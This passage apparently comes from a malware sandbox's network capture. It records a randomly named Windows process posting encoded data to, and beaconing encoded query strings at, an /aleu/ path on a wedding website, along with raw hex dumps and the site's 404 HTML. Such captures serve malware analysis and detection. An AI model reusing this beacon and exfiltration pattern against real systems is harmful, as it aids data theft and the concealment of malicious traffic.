                                                                                                                                                                                                        May 8, 2024 18:23:22.864140987 CEST1289INData Raw: 3e bc 18 a6 9a 07 91 87 6e 16 13 6f 9e 11 f9 e1 f1 73 dc 70 27 d0 53 62 48 71 df a8 b3 69 90 68 4a 8e 63 9a 0d 6f 10 4f 43 1f e1 5c e8 df 39 ce de e6 23 45 34 18 a2 b8 30 50 5c 59 ec 8d 64 f8 98 ac 10 26 19 e8 07 8b 87 37 e0 39 c7 b8 0e 47 46 8d
                                                                                                                                                                                                        Data Ascii: >nosp'SbHqihJcoOC\9#E40P\Yd&79GFO,j)R6ux9\(/)S,]1Pg8qj%y#lPZ*D_"!9n^h$7w{kx~4gj@:*KB-\sM+^ 2(|X
                                                                                                                                                                                                        May 8, 2024 18:23:22.864155054 CEST1289INData Raw: 82 6c 7b 0a 63 49 13 1e a1 f3 3c bf 57 a7 f2 17 b0 82 fe 01 dc f0 25 59 22 76 5f 2c e2 6b f8 6e 61 88 dc 5b 7b 36 c7 57 fe 30 45 04 6a 19 75 99 c7 85 8c 1a 6c 01 ad 4e e0 23 31 07 4f 4a be c3 ac f5 83 71 3c c1 96 1c 6a 6c 18 9f eb 43 89 c4 cd 8e
                                                                                                                                                                                                        Data Ascii: l{cI<W%Y"v_,kna[{6W0EjulN#1OJq<jlC=``]hw) 8dPRG=p$z8kO<0WUN$=t^#dqs% :oq6xwUJA-UpIf:KhM6*T_
                                                                                                                                                                                                        May 8, 2024 18:23:22.864167929 CEST1289INData Raw: 38 93 3f 4b e7 d8 2c 61 26 cd e6 0d 6e 56 14 20 60 74 7d 77 fc 32 5f 2d 02 4e f8 d5 69 1b 6a f1 c6 8f 8b 7c 17 4b a6 65 6d dc 71 b0 be 01 0e 22 fc f1 59 64 11 ef cc ce 50 3b d6 fe 1d 6e 7f c5 31 2f e6 67 e6 43 3f 7b 72 8a ef 2d 78 7a 76 fa 2a 73
                                                                                                                                                                                                        Data Ascii: 8?K,a&nV `t}w2_-Nij|Kemq"YdP;n1/gC?{r-xzv*s3LIF:\+S{w=@{l9yjlK^|Sh78td(l/|%H})0fZZP}N?V-AfQ`@P
                                                                                                                                                                                                        May 8, 2024 18:23:23.176656008 CEST1289INData Raw: b7 54 ff b5 bc 5d df 02 3e d7 79 da c3 d5 1d d2 08 5f 5d 32 ed e3 22 00 1e c1 58 c8 5d b2 12 92 40 51 4d 7a 73 ce a5 9a 73 cc 6a 0a 4f 04 ad 3f 04 e5 14 57 ee dd 0b 03 e6 f5 4d 4f 22 c5 e4 36 99 15 aa c2 04 ba c1 28 10 49 26 e5 39 61 31 f2 fc b5
                                                                                                                                                                                                        Data Ascii: T]>y_]2"X]@QMzssjO?WMO"6(I&9a1FSBFy<]b=JK9S!L rNlK[f3eN-4El'cA)"+I!U9~)#qjy8PE/8f)1["zb5yVEnzy


                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                        31192.168.2.4497753.73.27.108804500C:\Program Files (x86)\ZSEZEOIRaEGcNTbypkRykbCSrfKSoUaZhKhKinOATervHyZCBLXrUflUUMoOPVwtq\DfdOmQvPqYXHyvsLVgDsvnqUHhsrOM.exe
                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                        May 8, 2024 18:23:25.293934107 CEST10859OUTPOST /aleu/ HTTP/1.1
                                                                                                                                                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                                                                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                        Accept-Encoding: gzip, deflate
                                                                                                                                                                                                        Host: www.valentinaetommaso.it
                                                                                                                                                                                                        Origin: http://www.valentinaetommaso.it
                                                                                                                                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                        Content-Length: 10303
                                                                                                                                                                                                        Cache-Control: max-age=0
                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                        Referer: http://www.valentinaetommaso.it/aleu/
                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.157 Safari/537.36
                                                                                                                                                                                                        Data Raw: 6a 6e 34 6c 4e 62 3d 6e 4c 77 37 62 41 57 64 69 61 50 47 48 2b 2f 37 44 49 73 79 54 50 47 74 7a 4d 4e 6a 70 7a 46 63 4e 75 48 55 73 2b 77 65 49 72 70 70 79 69 51 79 67 38 4d 49 55 35 74 6a 61 6a 44 32 76 4d 6d 2f 63 6e 65 77 52 30 53 6b 34 75 2f 55 4b 72 42 71 50 69 66 77 49 2f 44 4a 68 55 31 64 54 45 4f 4e 6d 54 45 2f 6d 78 44 55 6a 53 76 4f 41 70 58 65 4c 6e 39 35 2b 45 37 68 54 31 76 4f 51 38 45 6d 4d 64 75 55 34 35 62 75 30 74 79 4e 54 34 4e 50 71 42 58 36 4f 6f 62 68 56 64 57 52 52 59 54 64 52 61 71 76 72 5a 2f 77 6c 2b 2f 55 51 6a 36 37 6e 74 78 6d 36 69 64 58 35 63 30 30 53 73 56 38 37 56 46 74 5a 6c 73 44 77 4c 52 2f 34 44 50 63 54 56 30 38 37 79 6f 4c 35 75 76 31 45 65 2f 72 56 78 51 44 48 76 37 73 39 7a 7a 5a 54 64 56 52 33 71 41 46 33 6f 50 43 36 41 4b 43 47 75 72 54 7a 52 41 2b 63 62 74 71 6b 63 6b 73 7a 73 7a 49 65 45 32 33 41 30 6e 4c 59 49 47 43 6b 67 56 32 78 37 59 69 33 68 6c 55 4a 4c 6c 30 33 6d 4f 67 4d 38 38 77 45 41 32 49 41 2b 39 42 6c 38 6b 74 47 6e 6d 47 4f 62 7a 57 4a 33 64 [TRUNCATED]
                                                                                                                                                                                                        Data Ascii: jn4lNb=nLw7bAWdiaPGH+/7DIsyTPGtzMNjpzFcNuHUs+weIrppyiQyg8MIU5tjajD2vMm/cnewR0Sk4u/UKrBqPifwI/DJhU1dTEONmTE/mxDUjSvOApXeLn95+E7hT1vOQ8EmMduU45bu0tyNT4NPqBX6OobhVdWRRYTdRaqvrZ/wl+/UQj67ntxm6idX5c00SsV87VFtZlsDwLR/4DPcTV087yoL5uv1Ee/rVxQDHv7s9zzZTdVR3qAF3oPC6AKCGurTzRA+cbtqkckszszIeE23A0nLYIGCkgV2x7Yi3hlUJLl03mOgM88wEA2IA+9Bl8ktGnmGObzWJ3d403kILF7L8yOX4OFtU2DA7F3x0/fQSMO9w+xxJqqpgJpwtUJF73IAjOJlPU0Wo+xwyYg4Bu9I+XrJdpqWhtDAndytqR0TWbqwQO+MeJLHav5aWmTmFxCywkMssrn+uqABiZTfJmRl02MbHREmloClyEQtDMSIu4vkAhlA/A+JeR8tKPIdui7nsmfHF4Y42FsSYvYT/Sbnc8L5KEntIJUkmBIqSNUJraKpjbXk6Vm7VFtkh7FB9dvLow0aN00Z7xjZKZvFIhXKULOKKhxZqJXL1hdT7ND4nWKL9APtHRdf+GRTMu/2CM0Z4VfixMt1Kr0+1nVdBeZ0CWRBn+kIoqMz65unrwm6mDYpub/Kly2xu18+xI5klsz+2p2QuvKU0e/8w7KG1cYmzBM9aJyqONXOOC4XD9gPUNDXkaPg+OuBp+j8+nKVYLFD+nChwFUb4uDIoI2xU2PKSM8wJb2Aor/VlhbwfQYyTXlPQUnkoVV4fKKuulLpZwm2L1cwXvIE2RG3S22vzaUrqKtAJD9fU49FaE2+g6iansllfX4GbSOxGGHPpw22jq4GBpQoEyj9r06m6IA//XBy+VZIzTx6karrTdxXZRX7bFGMVSgWLnQDv26roq02ZLXBQyAYyehtEY8lbC/TNtydOeOBRg1qmZLQGGb6Yr6RgJYzi [TRUNCATED]
                                                                                                                                                                                                        May 8, 2024 18:23:25.649450064 CEST1289INHTTP/1.1 404 Not Found
                                                                                                                                                                                                        Server: openresty
                                                                                                                                                                                                        Date: Wed, 08 May 2024 16:23:25 GMT
                                                                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                        Set-Cookie: PHPSESSID=gbci7dr4gbuvpitvmsd5psuv9t; path=/; domain=valentinaetommaso.it; HttpOnly
                                                                                                                                                                                                        Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                                                                        Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                                        Content-Encoding: gzip
                                                                                                                                                                                                        Data Raw: 33 37 38 34 0d 0a 1f 8b 08 00 00 00 00 00 04 03 ed 7d dd 76 db c6 92 ee f5 de 6b cd 3b 20 9c 49 22 9d 88 e0 af 48 51 16 9d 51 64 39 d6 19 cb d6 b6 e4 64 f6 b6 3d 5c 20 08 92 88 49 80 26 40 c9 b2 e2 07 3b d7 e7 c5 ce f7 55 77 03 0d fe 48 b4 93 59 b3 2f 8e 97 25 81 e8 ee ea ea ea ea aa ea ea aa e6 d1 37 4f 5e 9e 5c fd fd e2 d4 19 a7 d3 c9 e3 bf 1e f1 8f e3 4f bc 24 e9 96 a2 b8 fc 5b 52 72 66 f3 60 18 7e ec 96 e2 d1 21 6a a5 b3 e4 b0 52 89 47 33 77 1a 54 a2 e4 5f 4b ce c4 8b 46 dd 52 98 96 1e ff 0b da 07 de e0 f1 d1 24 8c de 3b f3 60 d2 2d a1 b1 1f 47 51 e0 a7 25 67 0c 40 dd 92 01 31 a8 0d c2 fa e4 d3 62 dc 69 0f c7 75 d7 9f c4 8b c1 70 1e 47 a9 1b 05 a8 ec cf e3 24 89 e7 e1 28 8c b6 83 37 44 d3 c4 1d 25 a9 97 86 be eb c7 d3 25 18 d3 20 f5 1c 7f ec cd 93 20 ed 96 16 e9 b0 7c 50 b2 21 87 c0 f3 8b 70 ac 0c c3 49 90 54 ea 03 fc 0f f9 73 dd 18 bb c9 f5 e8 c7 d9 b8 eb f7 1b 5e fb 20 e8 ec b7 4b 4e 7a 3b 0b 40 9f a9 37 0a 2a 28 fe e1 e3 74 52 72 92 f0 53 00 12 7b d1 ed 9f 82 44 b5 5d a9 b6 87 fc f9 f4 e1 e0 [TRUNCATED]
                                                                                                                                                                                                        Data Ascii: 3784}vk; I"HQQd9d=\ I&@;UwHY/%7O^\O$[Rrf`~!jRG3wT_KFR$;`-GQ%g@1biupG$(7D%% |P!pITs^ KNz;@7*(tRrS{D]K>Z*i.(Dl6i#/2w9,>.? v(iNj);8s8ry|iix3Tx:hD,w7xdz;C?(0)4M8YQ9fq8Oc/Xz)Ujs`d}i0=0B"`p@f<VJcEggF*U&?KM_i7`OJaMOfvI?DN#O:|dnA'`(?jPAc8AOg;elU^?im)^&%r:$iY*5/p6XYhgUkjmX;;w u7GI]yw&JVw|G5
                                                                                                                                                                                                        May 8, 2024 18:23:25.649569035 CEST1289INData Raw: ac ee a5 dd 41 ec 2f a6 d0 1b ee 87 45 30 bf bd 0c 26 30 c8 e2 f9 f1 64 b2 f3 3d 2d 36 e7 b1 43 29 f4 86 22 fb 7f 75 4b 90 bc a5 77 6f b4 b0 bd 7f 11 bf fb 7e f7 51 70 94 ba 50 4a a3 74 fc 28 f8 e1 87 dd f4 4d f0 ce 9d 07 d3 f8 3a 38 4e a1 b6 fa
                                                                                                                                                                                                        Data Ascii: A/E0&0d=-6C)"uKwo~QpPJt(M:8N4)WB7;{{05{&|4h!u)l$tHaSXoqE 0&1Jn:ih[dB;xi)VsVNrPA48F^dU+t";^8B
                                                                                                                                                                                                        May 8, 2024 18:23:25.649719000 CEST1289INData Raw: df 51 38 9c 43 de c8 b3 03 ea e4 2e 47 ae de 51 1c 8f 60 17 7b a3 a9 17 61 74 73 7a 0a e1 c7 74 e9 f8 fc 31 1c 74 7f be 3a 2f ef 37 eb e7 e7 97 cf 4b 0a c4 38 a0 a3 a3 0b c6 51 9f 95 0f 25 fb 28 5a ac 4b fb 16 2c 7f 7b 08 c1 11 3c ba 0e 93 10 ca
                                                                                                                                                                                                        Data Ascii: Q8C.GQ`{atszt1t:/7K8Q%(ZK,{<2Lo`DcPG}Lf8h'LAQYqv@Ia<dB' ]QeT$@*c?,d>B<ix(yqyV]edQfRqRjTOZR:vr
                                                                                                                                                                                                        May 8, 2024 18:23:25.649734020 CEST1289INData Raw: 86 d8 e3 94 1e 9f 3d 77 ce 8f af 5e 9d 9d bf 7c 71 f6 d2 79 72 e6 6c 36 12 95 6d 08 ae 53 56 97 da cb 69 9d 61 99 40 1c fc 97 e3 71 b5 48 53 f8 e1 e1 e4 87 1f 1e 4f f3 10 1e 79 04 69 84 df 45 fd 64 f6 88 7e 48 dd 33 f6 f2 6b 50 30 8b 62 2d 59 68
                                                                                                                                                                                                        Data Ascii: =w^|qyrl6mSVia@qHSOyiEd~H3kP0b-Yh0!`5*-K/!,dI@M_P!r2S\^/R~<4\LjI^ )~0`pP&gz8>}L\W=KZd_4r0H
                                                                                                                                                                                                        May 8, 2024 18:23:25.649746895 CEST1289INData Raw: 36 c4 33 64 70 1d 7c 71 50 af 0b 86 2d f5 0c 62 ca f2 c0 14 91 d6 42 4b d2 fa 17 ce 32 56 74 46 6c 0e 82 44 06 16 8a da 20 23 c0 52 98 74 9a 6c 07 51 a9 1e 65 14 32 f4 0e 16 7c c3 05 8f 61 dc 1d 52 a0 7e a0 1e 9b 20 a6 d4 a8 77 48 87 da 3e 75 0e
                                                                                                                                                                                                        Data Ascii: 63dp|qP-bBK2VtFlD #RtlQe2|aR~ wH>ue@jEXn_>}G"Oii+[o3&;C@b_lX KUAd?8}eR[8Vkk?}0)[$cbLAc&TObq
                                                                                                                                                                                                        May 8, 2024 18:23:25.649763107 CEST1289INData Raw: ce ae ce 5e be 38 7e be 4d ed cb 67 67 17 17 e8 b0 77 f2 f2 d2 80 06 c2 88 c7 ff 0d eb ab c7 c8 0e 61 c3 e4 9c d2 84 42 6e c1 e8 1b 83 43 a8 de 63 1b 05 0b cf bf cd de cb e8 7a a9 f7 b1 17 44 ca aa 39 2c d5 24 80 7c 81 04 95 5b cc e7 80 cb 1c b1
                                                                                                                                                                                                        Data Ascii: ^8~MggwaBnCczD9,$|[N:W}1/*om^#lG_=Gsu~[y[Yv~#mEZ}r#C?y`c[_{kFO4ATJHlSWJ$z7I/iRoo5x[
                                                                                                                                                                                                        May 8, 2024 18:23:25.649785995 CEST1289INData Raw: e1 c4 7a cf 5c 7d 88 f1 a5 f7 7a 9c 3d 45 75 6e 77 00 51 ba 38 86 6f f8 16 16 62 2e a4 46 57 9e 4c 95 a2 dc e8 78 90 70 e2 0c a1 99 cb 4d 26 ef 63 aa ef 4a 4f 8e af 4e 7b 57 67 e7 a7 fc 80 9b 8c de 83 84 df 0e dc 6f a7 ee b7 7f 77 be 7d 76 f8 ed
                                                                                                                                                                                                        Data Ascii: z\}z=EunwQ8ob.FWLxpM&cJON{Wgow}v9cKvvv?!g7;IW{PRW&ywgnn7);Ue>fP^3J/'_:}qY?zi4..>n8p|
                                                                                                                                                                                                        May 8, 2024 18:23:25.649801970 CEST1289INData Raw: 3e bc 18 a6 9a 07 91 87 6e 16 13 6f 9e 11 f9 e1 f1 73 dc 70 27 d0 53 62 48 71 df a8 b3 69 90 68 4a 8e 63 9a 0d 6f 10 4f 43 1f e1 5c e8 df 39 ce de e6 23 45 34 18 a2 b8 30 50 5c 59 ec 8d 64 f8 98 ac 10 26 19 e8 07 8b 87 37 e0 39 c7 b8 0e 47 46 8d
                                                                                                                                                                                                        Data Ascii: >nosp'SbHqihJcoOC\9#E40P\Yd&79GFO,j)R6ux9\(/)S,]1Pg8qj%y#lPZ*D_"!9n^h$7w{kx~4gj@:*KB-\sM+^ 2(|X
                                                                                                                                                                                                        May 8, 2024 18:23:25.649816036 CEST1289INData Raw: 82 6c 7b 0a 63 49 13 1e a1 f3 3c bf 57 a7 f2 17 b0 82 fe 01 dc f0 25 59 22 76 5f 2c e2 6b f8 6e 61 88 dc 5b 7b 36 c7 57 fe 30 45 04 6a 19 75 99 c7 85 8c 1a 6c 01 ad 4e e0 23 31 07 4f 4a be c3 ac f5 83 71 3c c1 96 1c 6a 6c 18 9f eb 43 89 c4 cd 8e
                                                                                                                                                                                                        Data Ascii: l{cI<W%Y"v_,kna[{6W0EjulN#1OJq<jlC=``]hw) 8dPRG=p$z8kO<0WUN$=t^#dqs% :oq6xwUJA-UpIf:KhM6*T_
                                                                                                                                                                                                        May 8, 2024 18:23:25.649837971 CEST1289INData Raw: 38 93 3f 4b e7 d8 2c 61 26 cd e6 0d 6e 56 14 20 60 74 7d 77 fc 32 5f 2d 02 4e f8 d5 69 1b 6a f1 c6 8f 8b 7c 17 4b a6 65 6d dc 71 b0 be 01 0e 22 fc f1 59 64 11 ef cc ce 50 3b d6 fe 1d 6e 7f c5 31 2f e6 67 e6 43 3f 7b 72 8a ef 2d 78 7a 76 fa 2a 73
                                                                                                                                                                                                        Data Ascii: 8?K,a&nV `t}w2_-Nij|Kemq"YdP;n1/gC?{r-xzv*s3LIF:\+S{w=@{l9yjlK^|Sh78td(l/|%H})0fZZP}N?V-AfQ`@P
                                                                                                                                                                                                        May 8, 2024 18:23:25.960336924 CEST1289INData Raw: b7 54 ff b5 bc 5d df 02 3e d7 79 da c3 d5 1d d2 08 5f 5d 32 ed e3 22 00 1e c1 58 c8 5d b2 12 92 40 51 4d 7a 73 ce a5 9a 73 cc 6a 0a 4f 04 ad 3f 04 e5 14 57 ee dd 0b 03 e6 f5 4d 4f 22 c5 e4 36 99 15 aa c2 04 ba c1 28 10 49 26 e5 39 61 31 f2 fc b5
                                                                                                                                                                                                        Data Ascii: T]>y_]2"X]@QMzssjO?WMO"6(I&9a1FSBFy<]b=JK9S!L rNlK[f3eN-4El'cA)"+I!U9~)#qjy8PE/8f)1["zb5yVEnzy


                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                        32192.168.2.4497763.73.27.108804500C:\Program Files (x86)\ZSEZEOIRaEGcNTbypkRykbCSrfKSoUaZhKhKinOATervHyZCBLXrUflUUMoOPVwtq\DfdOmQvPqYXHyvsLVgDsvnqUHhsrOM.exe
                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                        May 8, 2024 18:23:28.557718992 CEST485OUTGET /aleu/?jn4lNb=qJYbYwaLgLDJAMSEQ5QgE4656+lZvARVMq73qeoAA4dzyQoAh+hTVoh+ah/e183iVnKHGTOXkcX7G8t3YRyjUavOuE9Ld2m4gF80zlDT2iLkYInMKGRZjmA=&jvudu=jXz4lVThP2GL4N HTTP/1.1
                                                                                                                                                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                                                                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                        Host: www.valentinaetommaso.it
                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.157 Safari/537.36
                                                                                                                                                                                                        May 8, 2024 18:23:28.927701950 CEST1289INHTTP/1.1 404 Not Found
                                                                                                                                                                                                        Server: openresty
                                                                                                                                                                                                        Date: Wed, 08 May 2024 16:23:28 GMT
                                                                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                        Set-Cookie: PHPSESSID=ap19f1kakkqqdq1kfms236rbot; path=/; domain=valentinaetommaso.it; HttpOnly
                                                                                                                                                                                                        Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                                                                        Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                                        Data Raw: 61 31 37 30 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 22 20 70 72 65 66 69 78 3d 22 6f 67 3a 20 68 74 74 70 73 3a 2f 2f 6f 67 70 2e 6d 65 2f 6e 73 23 22 20 6c 61 6e 67 3d 22 69 74 22 3e 0d 0a 3c 68 65 61 64 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 65 63 6f 6e 6e 65 63 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 64 31 64 69 32 6c 7a 75 68 39 37 66 68 32 2e 63 6c 6f 75 64 66 72 6f 6e 74 2e 6e 65 74 22 20 63 72 6f 73 73 6f 72 69 67 69 6e 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 65 63 6f 6e 6e 65 63 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 66 6f 6e 74 73 2e 67 73 74 61 74 69 63 2e 63 6f 6d 22 20 63 72 6f 73 73 6f 72 69 67 69 6e 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 69 63 6f 6e 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 64 31 64 69 32 6c 7a 75 68 39 37 66 68 32 2e 63 6c 6f 75 64 66 72 6f 6e 74 2e 6e 65 74 2f 66 69 6c 65 73 2f 32 64 2f 32 64 69 2f 32 64 [TRUNCATED]
                                                                                                                                                                                                        Data Ascii: a170<!DOCTYPE html><html class="no-js" prefix="og: https://ogp.me/ns#" lang="it"><head><link rel="preconnect" href="https://d1di2lzuh97fh2.cloudfront.net" crossorigin><link rel="preconnect" href="https://fonts.gstatic.com" crossorigin><meta charset="utf-8"><link rel="icon" href="https://d1di2lzuh97fh2.cloudfront.net/files/2d/2di/2div3h.svg?ph=cb3a78e957" type="image/svg+xml" sizes="any"><link rel="icon" href="https://d1di2lzuh97fh2.cloudfront.net/files/07/07f/07fzq8.svg?ph=cb3a78e957" type="image/svg+xml" sizes="16x16"><link rel="icon" href="https://d1di2lzuh97fh2.cloudfront.net/files/1j/1j3/1j3767.ico?ph=cb3a78e957"><link rel="apple-touch-icon" href="https://d1di2lzuh97fh2.cloudfront.net/files/1j/1j3/1j3767.ico?ph=cb3a78e957"><link rel="icon" href="https://d1di2lzuh97fh2.cloudfront.net/files/1j/1j3/1j3767.ico?ph=cb3a78e957"> <meta http-equiv="X-UA-Compatible" content="IE=edge"> <title
                                                                                                                                                                                                        May 8, 2024 18:23:28.927727938 CEST1289INData Raw: 3e 34 30 34 20 2d 20 50 61 67 69 6e 61 20 6e 6f 6e 20 74 72 6f 76 61 74 61 20 3a 3a 20 6d 61 74 72 69 6d 6f 6e 69 6f 76 61 6c 65 6e 74 69 6e 61 65 74 6f 6d 6d 61 73 6f 3c 2f 74 69 74 6c 65 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22
                                                                                                                                                                                                        Data Ascii: >404 - Pagina non trovata :: matrimoniovalentinaetommaso</title> <meta name="viewport" content="width=device-width,initial-scale=1"> <meta name="msapplication-tap-highlight" content="no"> <link href="https://d1di2lzuh97fh2.cloud
                                                                                                                                                                                                        May 8, 2024 18:23:28.927740097 CEST1289INData Raw: 66 69 6c 65 73 2f 31 61 2f 31 61 6e 2f 31 61 6e 66 70 67 2e 63 73 73 3f 70 68 3d 63 62 33 61 37 38 65 39 35 37 22 20 64 61 74 61 2d 77 6e 64 5f 74 79 70 6f 67 72 61 70 68 79 5f 66 69 6c 65 3d 22 22 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c
                                                                                                                                                                                                        Data Ascii: files/1a/1an/1anfpg.css?ph=cb3a78e957" data-wnd_typography_file=""><link rel="stylesheet" href="https://d1di2lzuh97fh2.cloudfront.net/files/01/01h/01hx1m.css?ph=cb3a78e957" data-wnd_typography_desktop_file="" media="screen and (min-width:37.5e
                                                                                                                                                                                                        May 8, 2024 18:23:28.927752018 CEST1289INData Raw: 63 6f 6e 74 72 6f 6c 6c 61 20 73 65 20 68 61 69 20 69 6e 73 65 72 69 74 6f 20 6c 27 69 6e 64 69 72 69 7a 7a 6f 20 63 6f 72 72 65 74 74 6f 2e 22 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 6b 65 79 77 6f 72 64 73 22 20 63 6f 6e 74 65 6e 74 3d 22 22 3e
                                                                                                                                                                                                        Data Ascii: controlla se hai inserito l'indirizzo corretto."><meta name="keywords" content=""><meta name="generator" content="Webnode 2"><meta name="apple-mobile-web-app-capable" content="no"><meta name="apple-mobile-web-app-status-bar-style" content="bla
                                                                                                                                                                                                        May 8, 2024 18:23:28.927789927 CEST1289INData Raw: 62 3d 22 22 3b 66 6f 72 28 76 61 72 20 67 3d 31 3b 33 3e 3d 67 3b 67 2b 2b 29 62 2b 3d 28 22 30 22 2b 70 61 72 73 65 49 6e 74 28 68 5b 67 5d 2c 31 30 29 2e 74 6f 53 74 72 69 6e 67 28 31 36 29 29 2e 73 6c 69 63 65 28 2d 32 29 3b 22 30 22 3d 3d 3d
                                                                                                                                                                                                        Data Ascii: b="";for(var g=1;3>=g;g++)b+=("0"+parseInt(h[g],10).toString(16)).slice(-2);"0"===b.charAt(0)&&(d=parseInt(b.substr(0,2),16),d=Math.max(16,d),b=d.toString(16)+b.slice(-4));f.push(c[e][0]+"="+b)}if(f.length){var k=a.getAttribute("data-src"),l=k
                                                                                                                                                                                                        May 8, 2024 18:23:28.927802086 CEST1289INData Raw: 68 6e 2d 64 65 66 61 75 6c 74 20 77 6e 64 2d 6d 74 2d 63 6c 61 73 73 69 63 20 77 6e 64 2d 6e 61 2d 63 20 6c 6f 67 6f 2d 63 6c 61 73 73 69 63 20 73 63 2d 77 20 20 20 77 6e 64 2d 77 2d 77 69 64 65 72 20 77 6e 64 2d 6e 68 2d 6d 20 68 6d 2d 68 69 64
                                                                                                                                                                                                        Data Ascii: hn-default wnd-mt-classic wnd-na-c logo-classic sc-w wnd-w-wider wnd-nh-m hm-hidden menu-default"><div class="s-w"><div class="s-o"><div class="s-bg"> <div class="s-bg-l"> </div></div><
                                                                                                                                                                                                        May 8, 2024 18:23:28.927831888 CEST1289INData Raw: 73 73 3d 22 6d 65 6e 75 2d 69 74 65 6d 2d 74 65 78 74 22 3e 48 6f 6d 65 3c 2f 73 70 61 6e 3e 3c 2f 61 3e 0a 09 09 3c 2f 6c 69 3e 3c 6c 69 3e 0a 09 09 09 3c 61 20 63 6c 61 73 73 3d 22 6d 65 6e 75 2d 69 74 65 6d 22 20 68 72 65 66 3d 22 2f 69 6c 2d
                                                                                                                                                                                                        Data Ascii: ss="menu-item-text">Home</span></a></li><li><a class="menu-item" href="/il-giorno-del-matrimonio/"><span class="menu-item-text">Il giorno del matrimonio</span></a></li><li><a class="menu-item" href="/conferma-partecipazione/"><sp
                                                                                                                                                                                                        May 8, 2024 18:23:28.927845001 CEST1289INData Raw: 6f 20 74 72 6f 76 61 72 65 20 6c 61 20 70 61 67 69 6e 61 20 63 68 65 20 73 74 61 69 20 63 65 72 63 61 6e 64 6f 2e 20 50 65 72 20 66 61 76 6f 72 65 20 63 6f 6e 74 72 6f 6c 6c 61 20 73 65 20 68 61 69 20 69 6e 73 65 72 69 74 6f 20 6c 27 69 6e 64 69
                                                                                                                                                                                                        Data Ascii: o trovare la pagina che stai cercando. Per favore controlla se hai inserito l'indirizzo corretto.</p></div></div></div></div></div></div></div></section></div></div> </main> <footer class="l-f cf">
                                                                                                                                                                                                        May 8, 2024 18:23:28.927856922 CEST1289INData Raw: 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 73 66 2d 63 62 72 20 6c 69 6e 6b 22 3e 0d 0a 20 20 20 20 3c 61 20 68 72 65 66 3d 22 23 22 20 72 65 6c 3d 22 6e 6f
                                                                                                                                                                                                        Data Ascii: > <span class="sf-cbr link"> <a href="#" rel="nofollow">Cookies</a></span> </div> <div class="s-f-l-c-w"> <div class="s-f-lang l
                                                                                                                                                                                                        May 8, 2024 18:23:28.927870035 CEST1289INData Raw: 34 20 36 2e 37 30 37 2d 36 2e 31 32 36 20 36 2e 37 30 37 2d 32 2e 37 39 32 20 30 2d 36 2e 30 39 2d 31 2e 31 36 2d 36 2e 30 39 2d 36 2e 37 30 37 53 36 33 2e 31 20 35 2e 36 35 20 36 35 2e 38 39 33 20 35 2e 36 35 73 36 2e 31 32 37 20 31 2e 31 36 20
                                                                                                                                                                                                        Data Ascii: 4 6.707-6.126 6.707-2.792 0-6.09-1.16-6.09-6.707S63.1 5.65 65.893 5.65s6.127 1.16 6.127 6.707zm-1.848 0c0-3.48-1.27-5.004-4.242-5.004-2.936 0-4.205 1.523-4.205 5.004 0 3.48 1.27 5.003 4.205 5.003 2.937 0 4.242-1.523 4.242-5.003zM25.362 5.65c-5
                                                                                                                                                                                                        May 8, 2024 18:23:29.243781090 CEST1289INData Raw: 30 20 2e 39 30 36 2e 30 33 36 20 31 2e 33 34 2e 31 30 38 56 35 2e 37 32 32 63 2d 2e 34 33 34 2d 2e 30 37 33 2d 2e 38 37 2d 2e 31 31 2d 31 2e 33 34 2d 2e 31 31 2d 32 2e 37 32 20 30 2d 35 2e 39 34 36 20 31 2e 31 36 2d 35 2e 39 34 36 20 36 2e 35 36
